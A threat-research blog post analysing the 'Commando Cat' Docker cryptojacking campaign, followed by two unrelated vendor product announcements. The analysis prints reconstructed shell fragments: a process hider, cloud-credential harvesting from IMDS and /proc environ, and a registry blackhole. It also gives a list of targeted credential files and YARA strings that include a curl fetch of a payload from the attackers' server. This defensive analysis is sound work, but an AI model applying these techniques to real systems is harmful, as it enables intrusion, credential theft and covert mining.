Blog / Cloud / January 2, 2024

The Nine Lives of Commando Cat: Analyzing a Novel Malware Campaign Targeting Docker

"Commando Cat" is a novel cryptojacking campaign exploiting exposed Docker API endpoints. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher

Summary

  • Commando Cat is a novel cryptojacking campaign exploiting Docker for Initial Access
  • The campaign deploys a benign container generated using the Commando Project [1]
  • The attacker escapes this container and runs multiple payloads on the Docker host
  • The campaign deploys a credential stealer payload, targeting Cloud Service Provider credentials (AWS, GCP, Azure)
  • The other payloads exhibit a variety of sophisticated techniques, including an interesting process hiding technique (as discussed below) and a Docker Registry blackhole

Introduction: Commando Cat

Cado Security Labs (now part of Darktrace) encountered a novel malware campaign, dubbed “Commando Cat”, targeting exposed Docker API endpoints. This is the second campaign targeting Docker since the beginning of 2024, the first being the malicious deployment of the 9hits traffic exchange application, reported only a matter of weeks prior [2].

Attacks on Docker are relatively common, particularly in cloud environments. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives. Commando Cat is a cryptojacking campaign leveraging Docker as an initial access vector and (ab)using the service to mount the host’s filesystem, before running a series of interdependent payloads directly on the host. 

As described in the coming sections, these payloads are responsible for registering persistence, enabling a backdoor, exfiltrating various Cloud Service Provider credential files and executing the miner itself. Of particular interest are a number of evasion techniques exhibited by the malware, including an unusual process hiding mechanism. 

Initial access

The payloads are delivered to exposed Docker API instances over the Internet from the IP 45[.]9.148.193 (which also serves as the C2 server). The attacker instructs Docker to pull down a Docker image called cmd.cat/chattr. The cmd.cat (also known as Commando) project “generates Docker images on-demand with all the commands you need and simply point them by name in the docker run command.”

It is likely used by the attacker to seem like a benign tool and not arouse suspicion.

The attacker then creates the container with a custom command to execute:

Figure 1: Container with custom command to execute

It uses chroot to escape from the container onto the host operating system. This initial command checks if the following services are active on the system:

  • sys-kernel-debugger
  • gsc
  • c3pool_miner
  • dockercache

The gsc, c3pool_miner, and dockercache services are all created by the attacker after infection. The purpose of the check for sys-kernel-debugger is unclear; this service is not used anywhere in the malware, nor is it a standard Linux service. It is possible that the service is part of another campaign that the attacker does not want to compete with.
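The guard logic described above might look something like the following sketch. This is a hypothetical reconstruction (only the service names are taken from the campaign; the original was published as a screenshot):

```shell
# Hypothetical reconstruction of the pre-infection check: abort if any of
# the attacker's own services (or the mysterious sys-kernel-debugger) exist.
is_active() {
  # Succeeds only if the named systemd unit is currently active.
  systemctl is-active --quiet "$1" 2>/dev/null
}

for svc in sys-kernel-debugger gsc c3pool_miner dockercache; do
  if is_active "$svc"; then
    echo "found $svc, exiting" >&2
    exit 0   # host already claimed: do nothing
  fi
done
echo "no competing services detected"
```

On a clean host the loop falls through and infection proceeds; on an already-compromised host the script exits quietly.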

Once these checks pass, it runs the container again with another command, this time to infect it:

Figure 2: Container with infect command

This script first chroots to the host, and then tries to copy any binaries named wls or cls to wget and curl respectively. A common tactic of cryptojacking campaigns is to rename these binaries to evade detection; the attacker is likely anticipating that the box was previously infected by a campaign that renamed the binaries this way, and is undoing that. The attacker then uses either wget or curl to pull down the user.sh payload.
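The restore step can be illustrated as follows. The real script operates on system binary paths, so this sketch uses a temporary directory (with a fake downloader) to stay safe to run; paths and contents are illustrative:

```shell
# Some campaigns rename wget/curl to wls/cls to evade detection; the
# malware copies them back so it has a working downloader again.
# Demonstrated in a temp dir rather than /usr/bin.
bindir=$(mktemp -d)
printf '#!/bin/sh\necho fake-downloader\n' > "$bindir/wls"
chmod +x "$bindir/wls"

# The undo: restore each renamed binary under its original name.
[ -f "$bindir/wls" ] && cp "$bindir/wls" "$bindir/wget"
[ -f "$bindir/cls" ] && cp "$bindir/cls" "$bindir/curl"

"$bindir/wget"   # the restored downloader works again
```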

This is repeated with the sh parameter changed to the following other scripts:

  • tshd
  • gsc
  • aws

In addition, another payload is delivered directly as a base64 encoded script instead of being pulled down from the C2; this will be discussed in a later section.

user.sh

The primary purpose of the user.sh payload is to create a backdoor in the system by adding an SSH key to the root account, as well as adding a user with an attacker-known password.

On startup, the script changes the permissions and attributes on various system files such as passwd, shadow, and sudoers in order to allow for the creation of the backdoor user:

Figure 3

It then calls a function called make_ssh_backdoor, which inserts the following RSA and ED25519 SSH keys into the root user’s authorized_keys file:

Figure 4: make_ssh_backdoor function

It then updates a number of SSH config options in order to ensure root login is permitted, along with enabling public key and password authentication. It also sets the AuthorizedKeysFile option to a local variable named “$hidden_authorized_keys”; however, this variable is never actually defined in the script, resulting in public key authentication breaking.

Once the SSH backdoor has been installed, the script then calls make_hidden_door. The function creates a new user called “games” by adding an entry for it directly into /etc/passwd and /etc/shadow, as well as giving it sudo permission in /etc/sudoers.

The “games” user has its home directory set to /usr/games, likely in an attempt to appear legitimate. To continue this theme, the attacker has also opted to set the login shell for the “games” user to /usr/bin/nologin. This is not the path of the real nologin binary (usually /usr/sbin/nologin); it is instead a copy of bash placed there by the malware. This makes the “games” user appear to be a regular service account, while actually being a backdoor.

Figure 5: The games user
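Based on that description, the injected entries would look something like the following. This is illustrative only: the UIDs and exact sudoers syntax were not published, and are assumptions here.

```
# /etc/passwd - a service-account-looking entry with a working shell
games:x:1001:1001::/usr/games:/usr/bin/nologin   # "nologin" is actually a copy of bash

# /etc/sudoers - grants the backdoor user full privileges
games ALL=(ALL:ALL) ALL
```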

With the two backdoors in place, the malware then calls home with the SSH details to an API on the C2 server. Additionally, it also restarts sshd to apply the changes it made to the configuration file, and wipes the bash history.

Figure 6: SSH details

This provides the attacker with all the information required to connect to the server via SSH at any time, using either the root account with a pubkey, or the “games” user with a password or pubkey. However, as previously mentioned, pubkey authentication is broken due to a bug in the script. Consequently, the attacker only has password access to “games” in practice.

tshd.sh

This script is responsible for deploying TinyShell (tsh), an open source Unix backdoor written in C [3]. Upon launch, the script will try to install make and gcc using either apk, apt, or yum, depending on which is available. The script then pulls a copy of the tsh binary from the C2 server, compiles it, and then executes it.

Figure 7

TinyShell works by listening on the host for incoming connections (on port 2180 in this case), with security provided by a hardcoded encryption key in both the client and server binaries. As the attacker has graciously provided the code, the key could be identified as “base64st”. 

A side effect of this is that other threat actors could easily scan for this port and try authenticating using the secret key, allowing anyone with the skills and resources to take over the botnet. TinyShell has been commonly used as a payload before, as an example, UNC2891 has made extensive use of TinyShell during their attacks on Oracle Solaris based systems [4].

The script then calls out to a freely available IP logger service called yip[.]su. This allows the attacker to be notified of where the tsh binary is running, so they can then connect to the infected machine.

Figure 8

Finally, the script drops another script to /bin/hid (also referred to as hid in the script), which can be used to hide processes:

Figure 9

This script works by cloning the Linux mtab file (the list of active mounts) to another directory. It then creates a new bind mount over the /proc/<pid> directory of the process the attacker wants to hide, before restoring the mtab. The bind mount causes any queries to that /proc/<pid> directory to return an empty directory, causing tools like ps aux to omit the process. Cloning the mtab and then restoring the older version also hides the created bind mount itself, making it harder to detect.
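Combining this description with the command strings later captured in the YARA indicators (mount --bind /usr/foo /proc/$1, cp /etc/mtab /usr/t), the hiding routine can be sketched as below. The real commands require root and would genuinely hide a process, so this sketch only echoes each step rather than executing it:

```shell
# Dry-run sketch of the /bin/hid process hider. "run" prints each command
# instead of executing it, so this is safe to run for analysis.
run() { echo "+ $*"; }

hide_pid() {
  pid="$1"
  run cp /etc/mtab /usr/t                 # snapshot the mount table
  run mount --bind /usr/foo "/proc/$pid"  # empty dir shadows the real /proc entry
  run cp /usr/t /etc/mtab                 # restore mtab, erasing the mount record
}

hide_pid 1234
```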

The script then uses this binary to hide the tshd process.

gsc.sh

This script is responsible for deploying a backdoor called gs-netcat, a souped-up version of netcat that can punch through NAT and firewalls. Its purpose is likely to act as a backdoor in scenarios where traditional backdoors like TinyShell would not work, such as when the infected host is behind NAT.

Gs-netcat works in a somewhat interesting way: in order for nodes to find each other, they use a shared secret rather than an IP address, connecting via the Global Socket Relay Network [5]. This permits gs-netcat to function in virtually every environment, as it circumvents many firewalls on both the client and server end. To calculate a shared secret, the script simply uses the victim’s IP and hostname:

Figure 10

This is more acceptable than tsh from a security point of view: there are about 4 billion possible IPv4 addresses and many more possible hostnames, making a brute force harder, although still possible using strategies such as lists of common hostnames and trying IPs from blocks known for hosting virtual servers, such as AWS ranges.
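The derivation can be sketched as follows. The placeholder IP stands in for the victim's public address, which the real script looks up externally; the exact concatenation is an assumption:

```shell
# Hypothetical reconstruction: the gs-netcat shared secret is built from
# the victim's IP and hostname, both trivially enumerable values.
VICIP="203.0.113.7"                               # placeholder public IP
VICHOST=$(cat /etc/hostname 2>/dev/null || uname -n)
SECRET="${VICIP}${VICHOST}"
echo "$SECRET"
```

Because both inputs are guessable, a determined third party could enumerate candidate secrets, which is what makes the scheme only marginally stronger than TinyShell's fixed key.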

The script proceeds to set up gs-netcat by pulling it from the attacker’s C2 server, using a specific version based on the architecture of the infected system. Interestingly, the attacker will use the cmd.cat containers to untar the downloaded payload if tar is not available on the system or fails. The script also uses /dev/shm instead of /tmp; this acts as a temporary file store, but is memory-backed rather than disk-backed. It is possible that this is an evasion mechanism, as it is much more common for malware to use /tmp. It also results in the artefacts never touching the disk, making forensics somewhat more difficult. This technique has been used before in BPFdoor, a high-profile Linux campaign [6].

Figure 11

Once the binary has been installed, the script creates a malicious systemd service unit to achieve persistence. This is a very common method for Linux malware to obtain persistence; however, not all systems use systemd, rendering this payload entirely ineffective on those systems. $VICCS is the shared secret discussed earlier, which is stored in a file and passed to the process.

Figure 12

The script then uses the previously discussed hid binary to hide the gs-netcat process. It is worth noting that this will not survive a reboot, as there is no mechanism to hide the process again after it is respawned by systemd.

Figure 13

Finally, the malware sends the shared secret to the attacker via their API, much like how it does with SSH:

Figure 14

This allows the attacker to run their client instance of gs-netcat with the shared secret and gain persistent access to the infected machine.

aws.sh

The aws.sh script is a credential grabber that pulls credentials from several files on disk, as well as from IMDS and environment variables. Interestingly, the script creates a marker file so that once it has run the first time, it can never run again, as the file is never removed. This is potentially to avoid arousing suspicion by generating lots of calls to IMDS or the AWS API, as well as keeping the keys harvested by the attacker distinct per infected machine.

The script overall is very similar to scripts that have been previously attributed to TeamTNT and could have been copied from one of their campaigns [7]. However, script-based attribution is difficult, and while the similarities are visible, it is hard to attribute this script to any particular group.

Figure 15

The first thing run by the script (if an AWS environment is detected) is the AWS grabber. First, it makes several requests to IMDS in order to obtain information about the instance’s IAM role and the security credentials for it. The timeout is likely used to stop this part of the script from taking a long time to run on systems where IMDS is not available. The script also appears to work only with IMDSv1, so it can be rendered ineffective by enforcing IMDSv2.

Figure 16

Information of interest to the attacker, such as instance profiles, access keys, and secret keys, is then extracted from the response and placed in a global variable called CSOF, which is used throughout the script to store captured information before sending it to the API.
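A minimal sketch of that extraction, run against a sample response. The field names are from the standard IMDS security-credentials document; the real script's exact parsing was published only as a screenshot, so the sed commands here are illustrative:

```shell
# Sample of the JSON returned by
# /latest/meta-data/iam/security-credentials/<role> under IMDSv1.
RESP='{"AccessKeyId":"ASIAEXAMPLE","SecretAccessKey":"wJalrEXAMPLEKEY","Token":"FwoGZXIvEXAMPLE"}'

# Crude sed-based field extraction into the collection variable.
AK=$(printf '%s' "$RESP" | sed -n 's/.*"AccessKeyId":"\([^"]*\)".*/\1/p')
SK=$(printf '%s' "$RESP" | sed -n 's/.*"SecretAccessKey":"\([^"]*\)".*/\1/p')
CSOF="AWS_ACCESS_KEY_ID=$AK AWS_SECRET_ACCESS_KEY=$SK"
echo "$CSOF"
```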

Next, it checks environment variables on the instance for AWS related variables, and adds them to CSOF if they are present.

Figure 17

Finally, it adds the sts caller identity returned from the AWS command line to CSOF.

Next up is the cred_files function, which executes a search for a few common credential file names and reads their contents into CSOF if they are found. It has a few separate lists of files it will try to capture.

CRED_FILE_NAMES:

  • "authinfo2"
  • "access_tokens.db"
  • ".smbclient.conf"
  • ".smbcredentials"
  • ".samba_credentials"
  • ".pgpass"
  • "secrets"
  • ".boto"
  • ".netrc"
  • "netrc"
  • ".git-credentials"
  • "api_key"
  • "censys.cfg"
  • "ngrok.yml"
  • "filezilla.xml"
  • "recentservers.xml"
  • "queue.sqlite3"
  • "servlist.conf"
  • "accounts.xml"
  • "kubeconfig"
  • "adc.json"
  • "azure.json"
  • "clusters.conf" 
  • "docker-compose.yaml"
  • ".env"

AWS_CREDS_FILES:

  • "credentials"
  • ".s3cfg"
  • ".passwd-s3fs"
  • ".s3backer_passwd"
  • ".s3b_config"
  • "s3proxy.conf"

GCLOUD_CREDS_FILES:

  • "config_sentinel"
  • "gce"
  • ".last_survey_prompt.yaml"
  • "config_default"
  • "active_config"
  • "credentials.db"
  • "access_tokens.db"
  • ".last_update_check.json"
  • ".last_opt_in_prompt.yaml"
  • ".feature_flags_config.yaml"
  • "adc.json"
  • "resource.cache"

The files are then grabbed by performing a find on the root file system for their names, with the results appended to a temporary file, before the final concatenation of the credential files is read back into the CSOF variable.

Figure 18: CSOF variable

Next up is get_prov_vars, which simply loops through all processes in /proc and reads their environment variables into CSOF. This is interesting, as the payload already checks environment variables in several places, such as the aws, google, and azure grabbers; it is unclear why it grabs all of this data and then grabs specific portions of it again.

Figure 19
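The core of such a loop can be sketched as follows: each /proc/<pid>/environ file is a NUL-separated list, flattened here into readable lines (the counting and echo are for demonstration; the real script appends the raw data to CSOF):

```shell
# Collect environment variables from every visible process. Entries the
# current user cannot read (other users' processes) are silently skipped.
count=$(for e in /proc/[0-9]*/environ; do
  tr '\0' '\n' < "$e" 2>/dev/null
done | grep -c '=' || true)
echo "collected $count environment entries"
```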

Regardless of what data has already been grabbed, the get_google and get_azure functions are called next. These work identically to the AWS environment variable grabber: each checks for the existence of a variable and then appends its contents (or the file’s contents, if the variable is a path) to CSOF.

Figure 20

The final data it grabs comes from an inspection of all running Docker containers via the get_docker function. This can contain useful information about what is running in the container and on the box in general, as well as potentially exposing more secrets that are passed to the container.

Figure 21

The script then closes out by sending all of the collected data to the attacker. The attacker has set a username and password on their API endpoint for collected data, the purpose of which is unclear. It is possible that the attacker is concerned about the endpoint being leaked and subsequently spammed with false data by internet vigilantes, and added the authentication as a mechanism allowing them to cycle access by updating the payload and API.

Figure 22

The base64 payload

As mentioned earlier, the final payload is delivered as a base64 encoded script rather than in the traditional curl-into-bash method used previously by the malware. This base64 is echoed into base64 -d, and then piped into bash. This is an extremely common evasion mechanism, with many script-based Linux threat actors using the same approach. It is interesting to note that the C2 IP used in this script is different from the other payloads.

The base64 payload serves two primary purposes: deploying an XMRig cryptominer, and “securing” the Docker install on the infected host.

When run, the script looks for traces of other malware campaigns. First, it removes all containers that have a command of /bin/bash -c 'apt-get or busybox, and then it removes all containers that do not have a command containing chroot (which is the initial command used by this payload).

Figure 23

Next, it looks for any services named “c3pool_miner” or “moneroocean_miner” and stops and disables them. It then looks for associated binaries, such as /root/c3pool/xmrig and /root/moneroocean/xmrig, and deletes them from the filesystem. These steps are taken prior to deploying the attacker’s own miner, so that it is not competing for CPU time with other threat actors.

Once the competing miners have been killed off, it then sets up its own miner. It does this by grabbing a config and binary from the C2 server and extracting it to /usr/sbin. This drops two files: docker-cache and docker-proxy.

The docker-proxy binary is a custom fork of XMRig, with the path to the attacker’s config file hardcoded in the binary. It is invoked by docker-cache, which acts as a stager to ensure it is running, while also having the functionality to update the binary, should a file with .upd be detected.

It then uses a systemd service to achieve persistence for the XMRig stager, using the name docker cache daemon to appear inconspicuous. It is interesting to note that the name dockercache was also used by the Cetus cryptojacking worm [8].

Figure 24

It then uses the hid script discussed previously to hide the docker-cache and docker-proxy services by creating a bind mount over their /proc entry. The effect of this is that if a system administrator were to use a tool like htop to try and see what process was using up the CPU on the server, they would not be able to see the process.

Finally, the attacker “secures” Docker. First, it pulls down the alpine image and tags it as docker/firstrun (the reason for this will become clear later), and then deletes any images in a hardcoded list of images commonly used in other campaigns.

Figure 25

Next, it blackholes the Docker registry by writing its hostname to /etc/hosts with an IP of 0.0.0.0.

Figure 26
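The write itself is a one-liner. This sketch operates on a copy of the hosts file so it does not actually cut the machine off from Docker Hub; the registry hostname is assumed to be registry-1.docker.io, which is what docker pull contacts by default:

```shell
# Blackhole the Docker registry by resolving it to 0.0.0.0. Demonstrated
# against a copy of /etc/hosts so this is safe to run.
HOSTS_FILE=$(mktemp)
cp /etc/hosts "$HOSTS_FILE" 2>/dev/null || true
echo "0.0.0.0 registry-1.docker.io" >> "$HOSTS_FILE"
grep registry-1 "$HOSTS_FILE"
```

Any subsequent docker pull resolving the registry through this hosts file would fail to connect, while locally cached images remain usable.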

This completely blocks other attackers from pulling their images and tools onto the box, eliminating the risk of competition. Keeping the Alpine image tagged as docker/firstrun allows the attacker to continue using the Docker API to spawn an Alpine container and break back in, as the image is already downloaded, so the blackhole has no effect on it.

Conclusion

This malware sample, despite being primarily scripts, is a sophisticated campaign with a large amount of redundancy and evasion that makes detection challenging. The usage of the hid process hider script is notable as it is not commonly seen, with most malware opting to deploy clunkier rootkit kernel modules. The Docker Registry blackhole is also novel, and very effective at keeping other attackers off the box.

The malware functions as a credential stealer, highly stealthy backdoor, and cryptocurrency miner all in one. This makes it versatile and able to extract as much value from infected machines as possible. The payloads seem similar to payloads deployed by other threat actors, with the AWS stealer in particular having a lot of overlap with scripts attributed to TeamTNT in the past. Even the C2 IP points to the same provider that has been used by TeamTNT in the past. It is possible that this group is one of the many copycat groups that have built on the work of TeamTNT.

Indicators of compromise (IoCs)

Hashes

user 5ea102a58899b4f446bb0a68cd132c1d

tshd 73432d368fdb1f41805eba18ebc99940

gsc 5ea102a58899b4f446bb0a68cd132c1d

aws 25c00d4b69edeef1518f892eff918c2c

base64 ec2882928712e0834a8574807473752a

IPs

45[.]9.148.193

103[.]127.43.208

Yara Rule

rule Stealer_Linux_CommandoCat { 
 meta: 
 description = "Detects CommandoCat aws.sh credential stealer script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "185564f59b6c849a847b4aa40acd9969253124f63ba772fc5e3ae9dc2a50eef0" 
 strings: 
 // Constants 
 $const1 = "CRED_FILE_NAMES" 
 $const2 = "MIXED_CREDFILES" 
 $const3 = "AWS_CREDS_FILES" 
 $const4 = "GCLOUD_CREDS_FILES" 
 $const5 = "AZURE_CREDS_FILES" 
 $const6 = "VICOIP" 
 $const7 = "VICHOST" 
 // Functions 
 $func1 = "get_docker()" 
 $func2 = "cred_files()" 
 $func3 = "get_azure()" 
 $func4 = "get_google()" 
 $func5 = "run_aws_grabber()" 
 $func6 = "get_aws_infos()" 
 $func7 = "get_aws_meta()" 
 $func8 = "get_aws_env()" 
 $func9 = "get_prov_vars()" 

 // Log Statements 
 $log1 = "no dubble" 
 $log2 = "-------- PROC VARS -----------------------------------" 
 $log3 = "-------- DOCKER CREDS -----------------------------------" 
 $log4 = "-------- CREDS FILES -----------------------------------" 
 $log5 = "-------- AZURE DATA --------------------------------------" 
 $log6 = "-------- GOOGLE DATA --------------------------------------" 
 $log7 = "AWS_ACCESS_KEY_ID : $AWS_ACCESS_KEY_ID" 
 $log8 = "AWS_SECRET_ACCESS_KEY : $AWS_SECRET_ACCESS_KEY" 
 $log9 = "AWS_EC2_METADATA_DISABLED : $AWS_EC2_METADATA_DISABLED" 
 $log10 = "AWS_ROLE_ARN : $AWS_ROLE_ARN" 
 $log11 = "AWS_WEB_IDENTITY_TOKEN_FILE: $AWS_WEB_IDENTITY_TOKEN_FILE" 

 // Paths 
 $path1 = "/root/.docker/config.json" 
 $path2 = "/home/*/.docker/config.json" 
 $path3 = "/etc/hostname" 
 $path4 = "/tmp/..a.$RANDOM" 
 $path5 = "/tmp/$RANDOM" 
 $path6 = "/tmp/$RANDOM$RANDOM" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat { 
 meta: 
 description = "Detects CommandoCat gsc.sh backdoor registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "d083af05de4a45b44f470939bb8e9ccd223e6b8bf4568d9d15edfb3182a7a712" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "SETPATH" 
 $const3 = "SETNAME" 
 $const4 = "SETSERV" 
 $const5 = "VICIP" 
 $const6 = "VICHN" 
 $const7 = "GSCSTATUS" 
 $const8 = "VICSYSTEM" 
 $const9 = "GSCBINURL" 
 $const10 = "GSCATPID" 

 // Functions 
 $func1 = "hidfile()" 

 // Log Statements 
 $log1 = "run gsc ..." 

 // Paths 
 $path1 = "/dev/shm/.nc.tar.gz" 
 $path2 = "/etc/hostname" 
 $path3 = "/bin/gs-netcat" 
 $path4 = "/etc/systemd/gsc" 
 $path5 = "/bin/hid" 

 // General 
 $str1 = "mount --bind /usr/foo /proc/$1" 
 $str2 = "cp /etc/mtab /usr/t" 
 $str3 = "docker run -t -v /:/host --privileged cmd.cat/tar tar xzf /host/dev/shm/.nc.tar.gz -C /host/bin gs-netcat" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat_tshd { 
 meta: 
 description = "Detects CommandoCat tshd TinyShell registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "65c6798eedd33aa36d77432b2ba7ef45dfe760092810b4db487210b19299bdcb" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "HOME" 
 $const3 = "TSHDPID" 

 // Functions 
 $func1 = "setuptools()" 
 $func2 = "hidfile()" 
 $func3 = "hidetshd()" 

 // Paths 
 $path1 = "/var/tmp" 
 $path2 = "/bin/hid" 
 $path3 = "/etc/mtab" 
 $path4 = "/dev/shm/..tshdpid" 
 $path5 = "/tmp/.tsh.tar.gz" 
 $path6 = "/usr/sbin/tshd" 
 $path7 = "/usr/foo" 
 $path8 = "./tshd" 

 // General 
 $str1 = "curl -Lk $SRCURL/bin/tsh/tsh.tar.gz -o /tmp/.tsh.tar.gz" 
 $str2 = "find /dev/shm/ -type f -size 0 -exec rm -f {} \\;" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

References:

  1. https://github.com/lukaszlach/commando
  2. https://www.darktrace.com/blog/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts
  3. https://github.com/creaktive/tsh
  4. https://cloud.google.com/blog/topics/threat-intelligence/unc2891-overview/
  5. https://www.gsocket.io/
  6. https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
  7. https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
  8. https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/


Blog / Proactive Security / October 24, 2025

Patch Smarter, Not Harder: Now Empowering Security Teams with Business-Aligned Threat Context Agents


Most risk management programs remain anchored in enumeration: scanning every asset, cataloging every CVE, and drowning in lists that rarely translate into action. Despite expensive scanners, annual pen tests, and countless spreadsheets, prioritization still falters at two critical points.

Context gaps at the device level: It’s hard to know which vulnerabilities actually matter to your business given a device’s existing privileges, the software it runs, and the controls that already reduce risk.

Business translation: Even when the technical priority is clear, justifying effort and spend in financial terms, especially across many affected devices, can delay action, particularly if it means halting other areas of the business that directly generate revenue.

The result is familiar: alert fatigue, “too many highs,” and remediation that trails behind the threat landscape. Darktrace / Proactive Exposure Management addresses this by pairing precise, endpoint‑level context with clear, financial insight so teams can prioritize confidently and mobilize faster.

A powerful combination: No-Telemetry Endpoint Agent + Cost-Benefit Analysis

Darktrace / Proactive Exposure Management now combines technical precision with business clarity in a single workflow. With this release, it delivers a more holistic approach, uniting technical context and financial insight to drive proactive risk reduction. The result is a single solution that helps security teams stay ahead of threats while reducing noise, delays, and complexity.

  • No-Telemetry Endpoint: Collects installed software data and maps it to known CVEs—without network traffic—providing device-level vulnerability context and operational relevance.
  • Cost-Benefit Analysis for Patching: Calculates ROI by comparing patching effort with potential exploit impact, factoring in headcount time, device count, patch difficulty, and automation availability.

Introducing the No-Telemetry Endpoint Agent

Darktrace’s new endpoint agent inventories installed software on devices and maps it to known CVEs without collecting network data, so you can prioritize using real device context and available security controls.

By grounding vulnerability findings in the reality of each endpoint, including its software footprint and existing controls, teams can cut through generic severity scores and focus on what matters most. The agent is ideal for remote devices, BYOD-adjacent fleets, or environments standardizing on Darktrace, and is available without additional licensing cost.

Figure 1: Darktrace / Proactive Exposure Management user interface

Built-In Cost-Benefit Analysis for Patching

Security teams often know what needs fixing, but stakeholders need to understand why now. Darktrace’s new cost-benefit calculator compares the total cost to patch against the potential cost of exploit, producing an ROI for the patch action that expresses security work in clear financial terms.

Inputs like engineer time, number of affected devices, patch difficulty, and automation availability are factored in automatically. The result is a business-aligned justification for every patching decision—helping teams secure buy-in, accelerate approvals, and move work forward with one-click ticketing, CSV export, or risk acceptance.

Figure 2: Darktrace / Proactive Exposure Management Cost Benefit Analysis

A Smarter, Faster Approach to Exposure Management

Together, the no-telemetry endpoint and Cost-Benefit Analysis advance the CTEM motion from theory to practice. You gain higher-fidelity discovery and validation signals at the device level, paired with business-ready justification that accelerates mobilization. The result is fewer distractions, clearer priorities, and faster, measurable risk reduction; this comes not from chasing every alert, but from focusing on what moves the needle now.

  • Smarter Prioritization: Device‑level context trims noise and spotlights the exposures that matter for your business.
  • Faster Decisions: Built‑in ROI turns technical urgency into executive clarity—speeding approvals and action.
  • Practical Execution: Privacy‑conscious endpoint collection and ticketing/export options fit neatly into existing workflows.
  • Better Outcomes: Close the loop faster—discover, prioritize, validate, and mobilize—on the same operating surface.

Committed to innovation

These updates are part of the broader Darktrace release, which also included:

1. Major innovations in cloud security with the launch of the industry’s first fully automated cloud forensics solution, reinforcing Darktrace’s leadership in AI-native security.

2. Darktrace Network Endpoint eXtended Telemetry (NEXT) is revolutionizing NDR with the industry’s first mixed-telemetry agent using Self-Learning AI.

3. Improvements to our OT product, purpose-built for industrial infrastructure: Darktrace / OT now brings a dedicated OT dashboard, segmentation-aware risk modeling, and expanded visibility into edge assets and automation protocols.

Join our Live Launch Event

When? 

December 9, 2025

What will be covered?

Join our live broadcast to experience how Darktrace is eliminating blind spots for detection and response across your complete enterprise with new innovations in Agentic AI across our ActiveAI Security platform. Industry leaders from IDC will join Darktrace customers to discuss challenges in cross-domain security, with a live walkthrough reshaping the future of Network Detection & Response, Endpoint Detection & Response, Email Security, and SecOps in novel threat detection and autonomous investigations.

About the author
Kelland Goodin
Product Marketing Specialist

Blog / Proactive Security / October 24, 2025

Darktrace Announces Extended Visibility Between Confirmed Assets and Leaked Credentials from the Deep and Dark Web


Why exposure management needs to evolve beyond scans and checklists

The modern attack surface changes faster than most security programs can keep up. New assets appear, environments change, and adversaries are increasingly aided by automation and AI. Traditional approaches like periodic scans, static inventories, or annual pen tests are no longer enough. Without a formal exposure program, many businesses are flying blind, unaware of where the next threat may emerge.

This is where Continuous Threat Exposure Management (CTEM) becomes essential. Introduced by Gartner, CTEM helps organizations continuously assess, validate, and improve their exposure to real-world threats. It reframes the problem: scope your true attack surface, prioritize based on business impact and exploitability, and validate what attackers can actually do today, not once a year.

With two powerful new capabilities, Darktrace / Attack Surface Management helps organizations evolve their CTEM programs to meet the demands of today’s threat landscape. These updates make CTEM a reality, not just a strategy.

Too much data, not enough direction

Modern Attack Surface Management tools excel at discovering assets such as cloud workloads, exposed APIs, and forgotten domains. But they often fall short when it comes to prioritization. They rely on static severity scores or generic CVSS ratings, which do not reflect real-world risk or business impact.

This leaves security teams with:

  • Alert fatigue from hundreds of “critical” findings
  • Patch paralysis due to unclear prioritization
  • Blind spots around attacker intent and external targeting

CISOs need more than visibility. They need confidence in what to fix first and context to justify those decisions to stakeholders.

Evolving Attack Surface Management

Attack Surface Management (ASM) must evolve from static lists and generic severity scores to actionable intelligence that helps teams make the right decision now.

Joining the recent addition of Exploit Prediction Assessment, which debuted in late June 2025, today we’re introducing two capabilities that push ASM into that next era:

  • Exploit Prediction Assessment: Continuously validates whether top-priority exposures are actually exploitable in your environment without waiting for patch cycles or formal pen tests.  
  • Deep & Dark Web Monitoring: Extends visibility across millions of sources in the deep and dark web to detect leaked credentials linked to your confirmed domains.
  • Confidence Score: our newly developed AI classification platform will compare newly discovered assets to assets that are known to belong to your organization. The more these newly discovered assets look similar to assets that belong to your organization, the higher the score will be.

Together, these features compress the window from discovery to decision, so your team can act with precision, not panic. The result is a single solution that helps teams stay ahead of attackers without introducing new complexities.

Exploit Prediction Assessment

Traditional penetration tests are invaluable, but they’re often a snapshot of that point-in-time, are potentially disruptive, and compliance frameworks still expect them. Not to mention, when vulnerabilities are present, teams can act immediately rather than relying solely on information from CVSS scores or waiting for patch cycles.  

Unlike full pen tests which can be obtrusive and are usually done only a couple times per year, Exploit Prediction Assessment is surgical, continuous, and focused only on top issues Instead of waiting for vendor patches or the next pen‑test window. It helps confirm whether a top‑priority exposure is actually exploitable in your environment right now.  

For more information on this visit our blog: Beyond Discovery: Adding Intelligent Vulnerability Validation to Darktrace / Attack Surface Management

Deep and Dark Web Monitoring: Extending the scope

Customers have been asking for this for years, and it is finally here. Defense against the dark web. Darktrace / Attack Surface Management’s reach now spans millions of sources across the deep and dark web including forums, marketplaces, breach repositories, paste sites, and other hard‑to‑reach communities to detect leaked credentials linked to your confirmed domains.  

Monitoring is continuous, so you’re alerted as soon as evidence of compromise appears. The surface web is only a fraction of the internet, and a sizable share of risk hides beyond it. Estimates suggest the surface web represents roughly ~10% of all online content, with the rest gated or unindexed—and the TOR-accessible dark web hosts a high proportion of illicit material (a King’s College London study found ~57% of surveyed onion sites contained illicit content), underscoring why credential leakage and brand abuse often appear in places traditional monitoring doesn’t reach. Making these spaces high‑value for early warning signals when credentials or brand assets appear. Most notably, this includes your company’s reputation, assets like servers and systems, and top executives and employees at risk.

